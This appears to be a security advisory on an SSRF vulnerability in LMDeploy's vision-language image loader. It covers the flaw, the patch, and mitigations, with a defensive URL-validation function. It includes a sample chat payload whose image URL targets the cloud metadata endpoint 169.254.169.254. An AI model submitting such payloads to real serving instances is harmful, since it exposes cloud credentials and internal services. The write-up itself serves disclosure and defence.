LMDeploy CVE-2026-33626 — SSRF in LLM Serving Toolkit Vision Module
AI relevance: LMDeploy is a widely used toolkit for compressing, deploying, and serving large language models — an SSRF in its vision-language module lets attackers reach cloud metadata endpoints and internal services from any LMDeploy instance processing multimodal inputs.
- CVE-2026-33626 (CVSS 7.5, High) is a Server-Side Request Forgery vulnerability in LMDeploy versions prior to 0.12.3.
- The flaw lives in `lmdeploy/vl/utils.py`: the `load_image()` function fetches arbitrary URLs from user-supplied image references without validating against internal or private IP ranges.
- Attackers can craft multimodal prompts with image URLs pointing to `169.254.169.254` (the AWS/GCP metadata endpoint), internal APIs, or other cloud-internal resources.
- Because LMDeploy runs as a model-serving backend, often inside the same network as other AI infrastructure components, a successful SSRF can map internal services, steal cloud credentials, or pivot to adjacent systems.
- The vulnerability is remotely exploitable with no authentication required and no user interaction beyond submitting a prompt with a malicious image URL.
- Version 0.12.3 patches the issue by adding IP validation to the URL-fetching logic.
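To make the attack shape concrete, here is a hedged sketch of the kind of request an attacker might submit to an LMDeploy instance exposing an OpenAI-compatible chat endpoint for a vision-language model. The model name and exact payload structure are illustrative assumptions, not taken from the advisory; the key point is that the `image_url` field carries a cloud-metadata address instead of a real image.

```python
# Hypothetical multimodal chat payload (OpenAI-compatible schema) targeting
# the SSRF: the "image_url" points at the cloud metadata service, which a
# vulnerable load_image() would fetch server-side without IP validation.
malicious_payload = {
    "model": "example-vl-model",  # placeholder model name, not from the advisory
    "messages": [
        {
            "role": "user",
            "content": [
                {"type": "text", "text": "Describe this image."},
                {
                    "type": "image_url",
                    "image_url": {
                        # AWS/GCP metadata endpoint instead of an image
                        "url": "http://169.254.169.254/latest/meta-data/"
                    },
                },
            ],
        }
    ],
}
```

On an unpatched server, the vision pipeline resolves and fetches this URL on the attacker's behalf, returning internal data in the model's context or error output.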
Why it matters
Model serving toolkits like LMDeploy process untrusted multimodal inputs as a core function, making input validation in vision pipelines a critical security boundary. An SSRF in this layer is particularly dangerous because inference servers typically run in cloud environments with rich metadata endpoints and internal service meshes. Combined with the growing trend of multimodal agents that can act on retrieved data, this SSRF could serve as a foothold for broader infrastructure compromise.
What to do
- Upgrade to LMDeploy 0.12.3 or later if you run the toolkit for model serving.
- Restrict outbound network access from model-serving containers to only required model registry and API endpoints; block access to cloud metadata IPs (e.g., `169.254.169.254`).
- Audit multimodal pipelines: any component that resolves external URLs from user input should enforce allowlists or block private/metadata IP ranges.
- Run model inference in isolated network segments — don't colocate serving containers with credential-bearing workloads.
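The allowlist/blocklist recommendation above can be sketched as a small pre-fetch check. This is a defensive illustration under the stated assumptions, not the actual validation added in LMDeploy 0.12.3: it resolves the URL's hostname and rejects any address that is private, loopback, link-local (which covers `169.254.169.254`), or reserved.

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_url_safe(url: str) -> bool:
    """Return False for URLs that resolve to private, loopback, link-local,
    or reserved addresses. A defensive sketch, not LMDeploy's actual patch."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        # Resolve every address the hostname maps to, not just the first.
        infos = socket.getaddrinfo(parsed.hostname, None)
    except socket.gaierror:
        return False
    for info in infos:
        ip = ipaddress.ip_address(info[4][0])
        # is_link_local rejects 169.254.0.0/16, i.e. the metadata endpoint.
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            return False
    return True
```

Note that resolving all addresses and checking each one matters: a hostname with both a public and a private A record could otherwise slip past a first-answer-only check. A production implementation should also pin the resolved IP for the actual fetch to avoid DNS-rebinding between check and request.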